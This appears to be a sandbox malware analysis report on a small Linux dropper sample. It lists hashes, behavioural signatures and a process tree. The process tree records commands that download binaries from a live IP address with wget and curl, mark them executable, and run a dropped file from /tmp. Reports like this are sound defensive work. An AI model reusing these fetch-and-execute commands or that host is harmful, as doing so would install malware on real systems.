Analysis
max time kernel: 139s
max time network: 148s
platform: debian-9_armhf
resource: debian9-armhf-20240729-en
resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 29-07-2024 05:16
Static task: static1
Behavioral task: behavioral1
  Sample: 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
  Resource: debian9-armhf-20240729-en
Behavioral task: behavioral3
  Sample: 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
  Resource: debian9-mipsel-20240729-en
General
Target: 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Size: 2KB
MD5: 3964a03b43bd29681a1cbabe37ff0be5
SHA1: 45077644cf8c6a6356a4b8a633618ab7d994ff63
SHA256: 06a10886d5e417be9f942bae7221d301552d490f2c4914e163a766ec4731cbeb
SHA512: 0e364a22d00875879d5b6af408891ff34e39db6a48f19fd1208a40507b88d60274b9416813bddff6e334933ec52553d94a5339459f9d314beda98b33fcf911a6
Malware Config
Signatures
Executes dropped EXE (1 IoCs)
  Processes:
    ioc: /tmp/SPLOIT  pid: 684  process: SPLOIT
Checks CPU configuration (1 TTPs, 1 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  Processes:
    description: File opened for reading  ioc: /proc/cpuinfo  process: curl
Reads runtime system information (2 IoCs)
  Reads data from the /proc virtual filesystem.
  Processes:
    description: File opened for reading  ioc: /proc/sys/crypto/fips_enabled  process: curl
    description: File opened for reading  ioc: /proc/self/auxv  process: curl
Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  Processes:
    description: File opened for modification  ioc: /tmp/SPLOIT  process: 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
Processes
[depth 1] /tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
  cmdline: /tmp/3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118
  - Writes file to tmp directory
  PID: 643
  [depth 2] /usr/bin/wget
    cmdline: wget http://185.172.111.210/bins/GOOGLE.x86
    PID: 644
  [depth 2] /usr/bin/curl
    cmdline: curl -O http://185.172.111.210/bins/GOOGLE.x86
    - Checks CPU configuration
    - Reads runtime system information
    PID: 652
  [depth 2] /bin/cat
    cmdline: cat GOOGLE.x86
    PID: 682
  [depth 2] /bin/chmod
    cmdline: chmod +x 3964a03b43bd29681a1cbabe37ff0be5_JaffaCakes118 SPLOIT
    PID: 683
  [depth 2] /tmp/SPLOIT
    cmdline: ./SPLOIT x86.GOOGLE
    - Executes dropped EXE
    PID: 684
  [depth 2] /usr/bin/wget
    cmdline: wget http://185.172.111.210/bins/GOOGLE.mips
    PID: 686